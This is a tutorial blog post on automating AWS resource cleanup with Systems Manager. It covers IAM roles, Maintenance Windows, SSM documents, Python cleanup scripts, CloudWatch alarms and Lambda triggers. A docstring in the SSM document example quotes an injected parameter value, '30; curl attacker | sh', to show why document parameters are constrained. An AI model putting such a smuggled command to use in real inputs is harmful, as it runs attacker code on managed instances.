Sidra Saleem for SUDO Consultants


How to Automate AWS Resource Cleanup with AWS Systems Manager in the vast expanse of cloud computing


Cloud computing needs no introduction, but it brings housekeeping obligations with it. Resources that are created and then forgotten (detached volumes, stale snapshots, idle instances) clutter the environment and keep billing every month. The cloud can be cheaper than on-premises infrastructure, but only if unused capacity is actually released, and that means treating cleanup as a routine, automated task rather than an occasional chore.

AWS offers a service for automating operational tasks across its resources while keeping the environment secure, organized and cost-effective: AWS Systems Manager. Among its uses are automating the removal of unused resources, preventing cost leakage and keeping the environment efficient.

Understanding AWS Systems Manager

AWS Systems Manager is the natural starting point for controlling the cost and performance of your resources. It gives developers and system administrators the tools they need to manage and monitor AWS resources, and on-premises servers, from one place.

AWS Systems Manager Capabilities

Systems Manager offers features designed for centralized management of your AWS resources. They can be grouped into areas, each addressing one aspect of resource management.

  • Node management: detailed visibility into EC2 instances and on-premises servers, and remote administration of them over the SSM Agent channel rather than through inbound SSH or RDP ports. Running scripts, collecting inventory and managing patches all fall under this area.
  • Application management: simplifies deployment and maintenance of applications across AWS environments and helps keep software updated and running as expected.
  • Configuration compliance: tracks whether resources match their desired configuration, which matters for meeting security and compliance standards.
  • Operations management: monitoring and diagnosis of AWS resources, with automated actions in response to specific conditions or events.
  • Parameter Store: a centralized store for configuration data, both plaintext values and encrypted (SecureString) values.

Utilizing AWS Systems Manager for Resource Management and Automation

You can use AWS Systems Manager for resource management and automation in several ways.

  • Patch Manager applies patches automatically to AWS resources and on-premises servers so that systems stay current with the latest security updates.
  • State Manager keeps configurations consistent across the AWS environment and reapplies changes or fixes whenever a resource drifts from its desired state.
  • Automation runbooks and Run Command automate the cleanup of unused resources such as EBS volumes, EC2 instances and RDS instances.

All in all, AWS Systems Manager is a helpful tool for managing AWS resources. Its capabilities let organizations ensure compliance, streamline operations and automate routine tasks.

Preparing Your AWS Environment for Automation

To get the full benefit of AWS Systems Manager for resource cleanup and other operational tasks, prepare the AWS environment carefully. That means granting the necessary permissions, configuring SSM Agent (Systems Manager Agent) on the managed nodes, and organizing your resources so automation can target them reliably.

Setting Up Necessary Permissions: IAM Roles and Policies for Systems Manager

  • For Systems Manager to act on your behalf, create IAM roles with the required permissions. AWS provides managed policies for this; AmazonSSMManagedInstanceCore grants an instance the permissions SSM Agent needs to register with, and be managed by, Systems Manager.
  • Attach an instance profile (IAM role) carrying that policy to each EC2 instance so that the instance can communicate with Systems Manager. Keep in mind that a cleanup script launched through Run Command executes on the instance with that role's credentials, so any ec2:DeleteVolume or similar permission the script needs ends up on the instance role as well. Scope such permissions tightly (by Region, resource tag condition or both), because anyone able to run code on that instance inherits them.
  • For finer control over what Systems Manager may and may not do, write custom IAM policies instead of relying solely on the managed ones.

Configuring Systems Manager Agent (SSM Agent) on Your Instances

  • SSM Agent is software installed on EC2 instances and on-premises servers so that Systems Manager can manage them. Most Amazon-provided AMIs (Amazon Linux, Ubuntu Server and Windows Server among them) ship with it preinstalled.
  • Verify that SSM Agent is installed on your instances. If it is not, the AWS documentation has installation and update instructions for each operating system.
  • Make sure the agent is running, otherwise it cannot communicate with Systems Manager. On systemd-based Linux distributions, sudo systemctl status amazon-ssm-agent shows its state (on Ubuntu installations that use the snap package the unit is snap.amazon-ssm-agent.amazon-ssm-agent), and aws ssm describe-instance-information lists the instances that have successfully registered as managed nodes. An instance missing from that list usually has an agent, IAM role or network (VPC endpoint or outbound HTTPS) problem; start the agent with the service manager or through Systems Manager itself once the cause is fixed.

Best Practices for Organizing Resources for Effective Management

Every AWS resource can carry tags, key-value pairs that let you organize resources in a way that aligns with your billing and operational practices, including marking ownership. For cleanup automation, tags are also the safety mechanism: consistent owner, environment and explicit protection tags let a script decide what is fair game and what must never be touched.

When a set of resources shares one or more tags, AWS Resource Groups let you manage and automate tasks against the whole group; like resources grouped together are easier to manage.

Structure resources hierarchically with a combination of accounts, organizational units (OUs) and service control policies (SCPs) in AWS Organizations. This structure makes operational policies and governance easier to apply consistently.

Prepare your AWS environment this way before automating operations with AWS Systems Manager: grant the necessary permissions, configure SSM Agent correctly on the instances, and organize your resources so that automation can find and target them.

Automating Resource Cleanup with Maintenance Windows

Automating the resource cleanup process is essential for an efficiently managed, cost-effective AWS environment. AWS Systems Manager Maintenance Windows give you a way to schedule and automate cleanup tasks so that they run regularly without manual intervention.

Introduction to Maintenance Windows in Systems Manager

Maintenance Windows, as the name suggests, define time windows during which maintenance tasks run against your AWS resources: software updates, patches and resource cleanup among them. Scheduling those tasks into quiet periods keeps the environment optimized without disrupting critical services.

Step-by-Step Guide to Creating a Maintenance Window for Resource Cleanup

Create a Maintenance Window

  • Open the AWS Systems Manager console and choose Maintenance Windows (listed under Change Management in the navigation pane), then choose Create maintenance window.
  • Give the window a name, a schedule (a cron or rate expression) and a duration, plus a cutoff after which no new tasks are started.

Register Targets

  • After creating the Maintenance Window, register the targets for cleanup by choosing Register targets.
  • Define the targets by tag, or select resources manually. Tag-based targeting is usually the better choice because newly created instances carrying the tag are picked up automatically.

Assign Tasks to the Maintenance Window

  • Choose Register tasks and pick the task type: Run Command for a Command document executed on the target instances, or Automation for an Automation runbook (Lambda functions and Step Functions state machines are also available as task types).
  • Select either a custom SSM document or an AWS-provided one for the cleanup, and set its parameters, concurrency and error threshold.

Setting Up Automation Tasks Within the Maintenance Window

Using AWS-Provided Automation Documents

  • As mentioned earlier, AWS offers pre-built Automation runbooks that cover common cleanup tasks, such as AWS-RemoveUnusedEBSVolumes or AWS-DeleteSnapshot. Check the Documents list in your Region (owner Amazon, document type Automation) for the current names and parameters before assigning one, for example with aws ssm list-documents --filters Key=Owner,Values=Amazon Key=DocumentType,Values=Automation.
  • When assigning a task, search for and select the AWS-provided document you want and configure its parameters.

Creating Custom SSM Documents for Specific Cleanup Tasks

  • If the AWS-provided documents do not meet your cleanup needs, you can create custom SSM Automation documents.
  • Go to Documents (under Shared Resources in the Systems Manager navigation pane), choose Create document and select Automation as the document type.
  • Define the automation steps in SSM document syntax (YAML or JSON; Automation documents use schemaVersion 0.3). For instance, a runbook can run a script that identifies and deletes EBS volumes that have been unattached for more than a given number of days.
  • Use the custom document when registering tasks in the Maintenance Window.

Following these steps lets you automate the cleanup of AWS resources effectively, with Maintenance Windows providing the schedule and the guardrails. Along with the money and resources saved, you get a tidier and more efficient cloud environment.

Implementing Custom Cleanup Scripts

Understanding Systems Manager is not enough; you also need to be able to write custom cleanup scripts. These are typically written in Python with the Boto3 AWS SDK and target unused resources such as load balancers, EC2 instances, snapshots and EBS volumes for deletion. This section covers writing such scripts, packaging them as SSM documents, and executing them through Systems Manager from both the AWS Management Console and the AWS CLI.

Writing Custom Cleanup Scripts

Python and Boto3 for Resource Cleanup

Key components of a Python script using Boto3 for the purpose of finding and deleting unattached EBS volumes are:

  • Initialize the Boto3 client for EC2.
  • Utilize filters to identify resources not currently in use (e.g., EBS volumes with the status available).
  • Implement logic to delete the identified resources safely.

Script Considerations

  • Build in a safety switch. Run Command executes the script non-interactively, so a confirmation prompt would simply hang the task; instead default to a dry run (EC2's DryRun flag performs the permission check without deleting) and require an explicit flag or document parameter to delete for real.
  • Implement logging so that every volume considered, skipped or deleted, and every error, is recorded with enough context to audit the run later.
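The script the two lists above describe, written out as an added example (not code from the original post): it finds unattached volumes older than a threshold, skips anything carrying a protection tag, defaults to an EC2 dry run, and logs every decision. The tag key DoNotDelete, the SAMPLE_VOLUMES records and the IAM permissions named in the docstring are assumptions made for illustration.

```python
"""Find and delete unattached EBS volumes older than a threshold.

Added example; not code from the original post. Assumes the caller's IAM
role has ec2:DescribeVolumes and ec2:DeleteVolume, and that volumes tagged
with the key DoNotDelete (assumed name) must never be removed.
"""
import argparse
import logging
from datetime import datetime, timedelta, timezone

log = logging.getLogger("ebs-cleanup")
PROTECT_TAG = "DoNotDelete"  # assumed protection tag key


def is_protected(volume):
    """True if the volume carries the protection tag, whatever its value."""
    return any(t.get("Key") == PROTECT_TAG for t in volume.get("Tags", []))


def select_stale_volumes(volumes, min_age_days, now=None):
    """Return IDs of 'available' (unattached) volumes created at least
    min_age_days ago and not protected.

    Pure function over the dicts that ec2.describe_volumes returns, so the
    selection rule can be unit tested without touching AWS.
    """
    now = now or datetime.now(timezone.utc)
    cutoff = now - timedelta(days=min_age_days)
    stale = []
    for vol in volumes:
        if vol.get("State") != "available" or is_protected(vol):
            continue
        if vol["CreateTime"] > cutoff:  # too young: may be mid-migration
            continue
        stale.append(vol["VolumeId"])
    return stale


def list_available_volumes(ec2):
    """Page through every unattached volume in the Region."""
    volumes = []
    pages = ec2.get_paginator("describe_volumes").paginate(
        Filters=[{"Name": "status", "Values": ["available"]}]
    )
    for page in pages:
        volumes.extend(page["Volumes"])
    return volumes


def delete_volumes(ec2, volume_ids, dry_run=True):
    """Delete each volume; returns {volume_id: outcome}.

    With DryRun=True EC2 performs the permission check and then raises
    DryRunOperation instead of deleting, which is recorded as 'would-delete'.
    """
    outcomes = {}
    for vid in volume_ids:
        try:
            ec2.delete_volume(VolumeId=vid, DryRun=dry_run)
            outcomes[vid] = "deleted"
        except Exception as err:  # botocore ClientError; kept generic so a fake client works offline
            code = getattr(err, "response", {}).get("Error", {}).get("Code", "")
            if code == "DryRunOperation":
                outcomes[vid] = "would-delete"
            else:
                outcomes[vid] = "error:" + (code or type(err).__name__)
        log.info("%s -> %s", vid, outcomes[vid])
    return outcomes


# Constructed sample records in the shape describe_volumes returns; used only
# to exercise the selection rule offline.
SAMPLE_NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)
SAMPLE_VOLUMES = [
    {"VolumeId": "vol-stale", "State": "available",
     "CreateTime": SAMPLE_NOW - timedelta(days=45), "Tags": []},
    {"VolumeId": "vol-young", "State": "available",
     "CreateTime": SAMPLE_NOW - timedelta(days=3), "Tags": []},
    {"VolumeId": "vol-protected", "State": "available",
     "CreateTime": SAMPLE_NOW - timedelta(days=90),
     "Tags": [{"Key": PROTECT_TAG, "Value": "true"}]},
    {"VolumeId": "vol-attached", "State": "in-use",
     "CreateTime": SAMPLE_NOW - timedelta(days=400)},
]


def main():
    parser = argparse.ArgumentParser(description="Delete stale unattached EBS volumes")
    parser.add_argument("--min-age-days", type=int, default=30)
    parser.add_argument("--yes", action="store_true",
                        help="actually delete; without it the run is a dry run")
    args = parser.parse_args()
    logging.basicConfig(level=logging.INFO, format="%(asctime)s %(levelname)s %(message)s")
    import boto3  # imported here so the pure functions above need no boto3 to test
    ec2 = boto3.client("ec2")
    stale = select_stale_volumes(list_available_volumes(ec2), args.min_age_days)
    log.info("%d stale volume(s): %s", len(stale), stale)
    delete_volumes(ec2, stale, dry_run=not args.yes)


if __name__ == "__main__":
    main()
```

Run it once without --yes and read the log: every stale volume should show would-delete (or an AccessDenied style error that tells you the instance role is missing ec2:DeleteVolume) before you ever pass --yes. Keeping the selection rule in a pure function is what makes the script reviewable: the test cases are the records above, not a live account.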

Packaging Scripts as SSM Documents

Creating the SSM Document

  • Package your cleanup script as an SSM Command document so that Systems Manager can run it on managed instances.
  • SSM documents define the actions Systems Manager performs on your managed instances, along with the parameters the caller may pass.

Document Format

  • SSM Documents can be written in YAML or JSON. Choose the format you prefer.

AWS CLI Command to Create an SSM Document

aws ssm create-document --content file://YourDocumentContent.json --name "CustomCleanupScript" --document-type "Command" --document-format JSON
  • Replace YourDocumentContent.json with the path to your own YAML or JSON file containing the SSM document content, and set --document-format to match the file. Command documents use schemaVersion 2.2 and an aws:runShellScript (Linux) or aws:runPowerShellScript (Windows) step that invokes your script.

Executing Custom Scripts through Systems Manager

Using the AWS Management Console

  • Open the AWS Systems Manager console.
  • Go to the Documents section and choose Create document.
  • Choose Command document and paste the document content that wraps your script.
  • Give it a suitable name and create the document.
  • Once the document exists, open Run Command.
  • Select the new document, specify the target instances, review the parameters, and execute the cleanup operation.

Using the AWS CLI

  • To execute your custom script on target instances, use the following CLI command:

aws ssm send-command --document-name "CustomCleanupScript" --targets "Key=instanceids,Values=instanceID1,instanceID2" --parameters "ParameterName=value"
  • Replace "CustomCleanupScript" with the name of your SSM document.
  • Replace "instanceID1,instanceID2" with the IDs of the instances you want to target, or use a tag target such as "Key=tag:CleanupGroup,Values=ebs" so that the command follows the tag rather than a fixed list of IDs.
  • The --parameters value must use the parameter names your document declares. A value like commands=... belongs to the AWS-provided AWS-RunShellScript document; a custom document only accepts the parameters defined in its content.
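An added example covering both the packaging step and the execution step above (not code from the original post): it builds a schemaVersion 2.2 Command document that wraps the cleanup script, checks that every parameter is constrained before the document is created, and assembles the send-command request with tag targeting and CloudWatch output. The script path /opt/cleanup/ebs_cleanup.py, the parameter names MinAgeDays and Apply, and the tag CleanupGroup=ebs are assumptions for illustration; the document name CustomCleanupScript is the one used in the CLI commands above.

```python
"""Package the cleanup script as an SSM Command document and run it.

Added example; not code from the original post. Assumes the cleanup script
is installed on the targets at /opt/cleanup/ebs_cleanup.py and accepts
--min-age-days and --yes, and that the caller has ssm:CreateDocument and
ssm:SendCommand.
"""
import json

DOCUMENT_NAME = "CustomCleanupScript"  # name used in the post's CLI examples


def build_command_document(script_path, description="Delete stale unattached EBS volumes"):
    """Return a schemaVersion 2.2 Command document as a dict.

    Document parameters are substituted textually into the shell command, so
    each one is fenced with allowedPattern or allowedValues. Without that,
    anyone permitted to call SendCommand could pass a value like
    "30; curl attacker | sh" as MinAgeDays and run it as the agent user.
    """
    return {
        "schemaVersion": "2.2",
        "description": description,
        "parameters": {
            "MinAgeDays": {
                "type": "String",
                "default": "30",
                "description": "Only volumes unattached at least this many days are deleted",
                "allowedPattern": "^[0-9]{1,4}$",
            },
            "Apply": {
                "type": "String",
                "default": "false",
                "description": "'true' deletes; anything else is a dry run",
                "allowedValues": ["true", "false"],
            },
        },
        "mainSteps": [
            {
                "action": "aws:runShellScript",
                "name": "cleanupEbs",
                "inputs": {
                    "timeoutSeconds": "900",
                    "runCommand": [
                        "set -eu",
                        'ARGS="--min-age-days {{ MinAgeDays }}"',
                        'if [ "{{ Apply }}" = "true" ]; then ARGS="$ARGS --yes"; fi',
                        f"python3 {script_path} $ARGS",
                    ],
                },
            }
        ],
    }


def validate_document(doc):
    """Sanity checks a reviewer would apply before create-document."""
    problems = []
    if doc.get("schemaVersion") != "2.2":
        problems.append("Command documents should use schemaVersion 2.2")
    for name, spec in doc.get("parameters", {}).items():
        if "allowedPattern" not in spec and "allowedValues" not in spec:
            problems.append(f"parameter {name} is unconstrained and is interpolated into a shell command")
    return problems


def create_document(ssm, doc, name=DOCUMENT_NAME):
    """Equivalent of the aws ssm create-document call shown above."""
    return ssm.create_document(Content=json.dumps(doc), Name=name,
                               DocumentType="Command", DocumentFormat="JSON")


def send_command_request(name=DOCUMENT_NAME, min_age_days=30, apply=False,
                         tag_key="CleanupGroup", tag_value="ebs",
                         log_group="/aws/ssm/SystemsManagerLogGroup"):
    """Build the kwargs for ssm.send_command: target by tag so new instances
    are covered, and ship stdout/stderr to CloudWatch Logs."""
    return {
        "DocumentName": name,
        "Targets": [{"Key": f"tag:{tag_key}", "Values": [tag_value]}],
        "Parameters": {"MinAgeDays": [str(min_age_days)],
                       "Apply": ["true" if apply else "false"]},
        "CloudWatchOutputConfig": {"CloudWatchLogGroupName": log_group,
                                   "CloudWatchOutputEnabled": True},
        "TimeoutSeconds": 600,
    }


if __name__ == "__main__":
    import boto3
    ssm = boto3.client("ssm")
    doc = build_command_document("/opt/cleanup/ebs_cleanup.py")
    problems = validate_document(doc)
    if problems:
        raise SystemExit("refusing to create document: " + "; ".join(problems))
    create_document(ssm, doc)
    resp = ssm.send_command(**send_command_request())  # dry run by default
    print("command id:", resp["Command"]["CommandId"])
```

The instance role needs logs:CreateLogGroup, logs:CreateLogStream and logs:PutLogEvents for the CloudWatch output to arrive; the SendCommand caller needs ssm:SendCommand on both the document and the targets, which is also where you restrict who can set Apply to true.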

Following these steps, you can use the automation features of AWS Systems Manager to create and execute custom resource cleanup tasks, and end up with an organized, cost-efficient AWS environment.

Monitoring and Logging

Another important part of automating AWS resource cleanup is monitoring the operations and logging their outcomes. Amazon CloudWatch is the natural fit: it provides the tools to track the execution of automation tasks and custom cleanup scripts and to send notifications based on their outcomes.

Configuring CloudWatch Logs for Systems Manager Operations

Enable CloudWatch Logging for Systems Manager

  • Run Command output is not sent to CloudWatch Logs by default. Enable it per command (the CloudWatch output option in the Run Command console, or CloudWatchOutputConfig in the API and CLI) and give the instance role the logs:CreateLogGroup, logs:CreateLogStream and logs:PutLogEvents permissions, otherwise the agent cannot write the log streams.

Setting Up CloudWatch Log Groups

  • You can create a dedicated CloudWatch log group for Systems Manager operations from the AWS Management Console or with the AWS CLI:
aws logs create-log-group --log-group-name /aws/ssm/SystemsManagerLogGroup
  • This log group then collects the output of Systems Manager operations, including the runs of your custom cleanup scripts. If you enable CloudWatch output without naming a log group, Systems Manager writes to a group named /aws/ssm/<document-name> instead.

Monitoring the Execution of Cleanup Tasks

View Execution Logs in CloudWatch

  • After the logging has been enabled, you can use CloudWatch console to monitor the execution of cleanup tasks. You can also find the relevant Log Group and review the log streams for task execution details.

Utilize Systems Manager Run Command History

  • Systems Manager also keeps a history of the commands sent through the service, including cleanup task executions. For each one it records success or failure per target, along with the captured output.

Setting Up Alarms and Notifications for Automation Task Outcomes

Create CloudWatch Alarms Based on Log Metrics

  • Another feature that you can use is CloudWatch Alarms. You can create and set these alarms based on log patterns or specific metrics from Systems Manager operations. For example, you can set up alarm for failed cleanup tasks by identifying the related error patterns in the logs.
  • You can enable the notification via Amazon SNS.

Configuring SNS Notifications

  • Create an SNS topic dedicated to notifications about Systems Manager task outcomes:
aws sns create-topic --name SystemsManagerNotifications
  • Subscribe your email address or SMS number to the topic to receive the notifications.
  • Attach the topic to your CloudWatch alarm as an alarm action so that task failures are reported in near real time.
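The alarm and notification chain described above, as an added example (not code from the original post): a metric filter counts failure lines in the cleanup log group, an alarm fires when that count exceeds zero, and the alarm's action is the SNS topic. It assumes the log group name used earlier, that the cleanup script marks failures with the literal token error: (as the script example earlier does), and an email subscriber; the namespace and metric names are arbitrary.

```python
"""Alarm on failed cleanup runs: metric filter -> alarm -> SNS topic.

Added example; not code from the original post. Assumes Run Command output
is shipped to LOG_GROUP and that failures appear there with the token
"error:". Namespace and metric names are illustrative.
"""
LOG_GROUP = "/aws/ssm/SystemsManagerLogGroup"
METRIC_NS = "Cleanup"
METRIC_NAME = "CleanupErrors"
TOPIC_NAME = "SystemsManagerNotifications"


def metric_filter_request(log_group=LOG_GROUP, pattern='"error:"'):
    """Count log events containing the failure token. Quoting the term keeps
    the colon as part of it; defaultValue 0 makes quiet periods report zero."""
    return {
        "logGroupName": log_group,
        "filterName": "cleanup-errors",
        "filterPattern": pattern,
        "metricTransformations": [{
            "metricName": METRIC_NAME,
            "metricNamespace": METRIC_NS,
            "metricValue": "1",
            "defaultValue": 0.0,
        }],
    }


def alarm_request(topic_arn, period=300):
    """Fire when at least one error was counted in a period. TreatMissingData
    is 'notBreaching' because a cleanup that ran clean, or did not run at all,
    emits no data points and must not page anyone."""
    return {
        "AlarmName": "ssm-cleanup-failed",
        "AlarmDescription": "Cleanup script reported an error",
        "Namespace": METRIC_NS,
        "MetricName": METRIC_NAME,
        "Statistic": "Sum",
        "Period": period,
        "EvaluationPeriods": 1,
        "Threshold": 0,
        "ComparisonOperator": "GreaterThanThreshold",
        "TreatMissingData": "notBreaching",
        "AlarmActions": [topic_arn],
    }


def deploy(session, email):
    """Create the topic, subscribe the address, and wire filter and alarm.
    `session` is a boto3.Session; create_topic is idempotent by name."""
    sns = session.client("sns")
    logs = session.client("logs")
    cloudwatch = session.client("cloudwatch")
    topic_arn = sns.create_topic(Name=TOPIC_NAME)["TopicArn"]
    sns.subscribe(TopicArn=topic_arn, Protocol="email", Endpoint=email)
    logs.put_metric_filter(**metric_filter_request())
    cloudwatch.put_metric_alarm(**alarm_request(topic_arn))
    return topic_arn


if __name__ == "__main__":
    import sys
    import boto3
    print(deploy(boto3.Session(), sys.argv[1]))
```

The email subscription must be confirmed from the inbox before notifications flow. If the cleanup runs on a fixed schedule, a second alarm on the metric's SampleCount (or on the Run Command invocation count) catches the opposite failure, a job that silently stopped running, which the error alarm alone never sees.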

This approach makes the cleanup process observable, so problems surface quickly and the automation keeps doing what it is supposed to do.

Security and Compliance Considerations

Security and compliance cannot be ignored when automating resource cleanup in AWS. To take care of these factors you need to come up with a strategic approach. This section highlights best practices for maintaining security and compliance throughout the automation process.

  • Apply the principle of least privilege: grant only the permissions each task actually needs, scoped to the resources it should touch. The cleanup script runs with the instance role, so that role, not just the operator's identity, is what needs auditing.
  • Keep secrets out of documents and scripts. SSM document content is readable by anyone with ssm:GetDocument, and Run Command parameters appear in the command history. Put credentials and other sensitive values in AWS Secrets Manager or in Systems Manager Parameter Store SecureString parameters, fetched at run time through the instance role, rather than embedding them or long-lived access keys in the script.
  • Understand and define data retention policies that align with your compliance requirements, and build safeguards into the scripts: dry-run defaults, a minimum resource age, protection tags, and a cap on how many resources a single run may delete.
  • Conduct regular audits and reviews of the automated cleanup processes, including the IAM policies behind them.
  • Maintain clear documentation of each automated process: the permissions it requires, the rationale for each cleanup task, and its impact on compliance.

Advanced Strategies for Cleanup Automation

If you want to automate the cleanup in AWS without the manual triggers or scheduled tasks then it is indeed possible! You just need to incorporate the advanced strategies that uses broader AWS eco-system. This section deals with the usage of AWS Lambda for event-driven cleanup along with the integration of Systems Manager with other services offered by AWS.

Leveraging AWS Lambda for Event-Driven Cleanup

  • AWS Lambda runs code in response to events, such as a resource changing state or a schedule firing. That makes it a good fit for starting cleanup tasks automatically the moment certain conditions are met.
  • Identify the events that signal resources ready for cleanup, for example the TerminateInstances or DeleteDBInstance API calls recorded by CloudTrail, or the EC2 instance state-change notifications, delivered through Amazon EventBridge.
  • Write the Lambda function in the language you prefer to perform the cleanup task, or to hand it off to a Systems Manager Automation runbook.
  • Configure EventBridge rules so that those events trigger the function.
  • Because the cleanup starts as soon as the event arrives, orphaned resources are billed for minutes rather than until the next scheduled window, and Lambda scales with the event volume on its own.
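An added example of the event-driven pattern above (not code from the original post): a Lambda handler that accepts either an EC2 instance state-change notification or the CloudTrail TerminateInstances event, extracts the terminated instance IDs, and starts a Systems Manager Automation runbook for each. The runbook name CleanupAfterTermination and its InstanceId parameter are hypothetical, and the sample events are constructed in the shape EventBridge delivers.

```python
"""Event-driven cleanup: a Lambda function that reacts to EC2 terminations by
starting a Systems Manager Automation runbook.

Added example; not code from the original post. Assumes an EventBridge rule
using one of the patterns below targets this function, that a runbook named
CleanupAfterTermination (hypothetical) exists and takes an InstanceId
parameter, and that the function role has ssm:StartAutomationExecution.
"""
import os

RUNBOOK = os.environ.get("CLEANUP_RUNBOOK", "CleanupAfterTermination")  # hypothetical name

# EventBridge rule patterns. The first fires on the instance state change, the
# second on the TerminateInstances API call recorded by CloudTrail.
STATE_CHANGE_PATTERN = {
    "source": ["aws.ec2"],
    "detail-type": ["EC2 Instance State-change Notification"],
    "detail": {"state": ["terminated"]},
}
CLOUDTRAIL_PATTERN = {
    "source": ["aws.ec2"],
    "detail-type": ["AWS API Call via CloudTrail"],
    "detail": {"eventSource": ["ec2.amazonaws.com"], "eventName": ["TerminateInstances"]},
}


def terminated_instances(event):
    """Return the instance IDs a termination event refers to, or [] for anything
    else. Checked again here so the function stays safe if the rule is loosened."""
    if event.get("source") != "aws.ec2":
        return []
    detail = event.get("detail") or {}
    kind = event.get("detail-type")
    if kind == "EC2 Instance State-change Notification":
        return [detail["instance-id"]] if detail.get("state") == "terminated" else []
    if kind == "AWS API Call via CloudTrail" and detail.get("eventName") == "TerminateInstances":
        if detail.get("errorCode"):  # the call failed; nothing was terminated
            return []
        items = ((detail.get("responseElements") or {}).get("instancesSet") or {}).get("items", [])
        return [item["instanceId"] for item in items]
    return []


def handler(event, context, ssm=None):
    """Lambda entry point. `ssm` is injectable so the logic can be tested offline."""
    ids = terminated_instances(event)
    if not ids:
        return {"started": []}
    if ssm is None:
        import boto3
        ssm = boto3.client("ssm")
    started = []
    for instance_id in ids:
        resp = ssm.start_automation_execution(
            DocumentName=RUNBOOK, Parameters={"InstanceId": [instance_id]})
        started.append(resp["AutomationExecutionId"])
    return {"started": started}


# Constructed sample events in the shapes EventBridge delivers.
SAMPLE_STATE_EVENT = {
    "source": "aws.ec2", "detail-type": "EC2 Instance State-change Notification",
    "detail": {"instance-id": "i-0123456789abcdef0", "state": "terminated"},
}
SAMPLE_RUNNING_EVENT = {
    "source": "aws.ec2", "detail-type": "EC2 Instance State-change Notification",
    "detail": {"instance-id": "i-0123456789abcdef0", "state": "running"},
}
SAMPLE_CLOUDTRAIL_EVENT = {
    "source": "aws.ec2", "detail-type": "AWS API Call via CloudTrail",
    "detail": {"eventSource": "ec2.amazonaws.com", "eventName": "TerminateInstances",
               "responseElements": {"instancesSet": {"items": [
                   {"instanceId": "i-0123456789abcdef0"},
                   {"instanceId": "i-0fedcba9876543210"}]}}},
}
```

Automation executions are the better hand-off target than deleting from inside the function: the runbook's steps, parameters and outcome land in the Systems Manager execution history, and the Lambda role only needs ssm:StartAutomationExecution on that one document rather than broad delete permissions.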

Integrating Systems Manager with Other AWS Services

AWS CloudFormation lets you describe the infrastructure resources in your environment as code, so stacks can be deleted as a unit instead of resource by resource. AWS Config evaluates resources against rules and can trigger remediation through Systems Manager Automation runbooks, which turns a non-compliant resource (an untagged volume, say) into an automated cleanup action. AWS Service Catalog lets organizations create and manage catalogs of approved IT services, so what gets provisioned is predictable in the first place. Combining these event-driven mechanisms with AWS Lambda, and integrating Systems Manager with AWS Config and CloudFormation, gives you a far more efficient resource cleanup process.


In this article we have explored the automation of AWS resource cleanup using AWS Systems Manager, from preparing permissions and agents, through Maintenance Windows, custom scripts and documents, to monitoring, security considerations and event-driven strategies. Organizations of all sizes are encouraged to explore and implement these automation strategies for a cost-effective cloud environment.
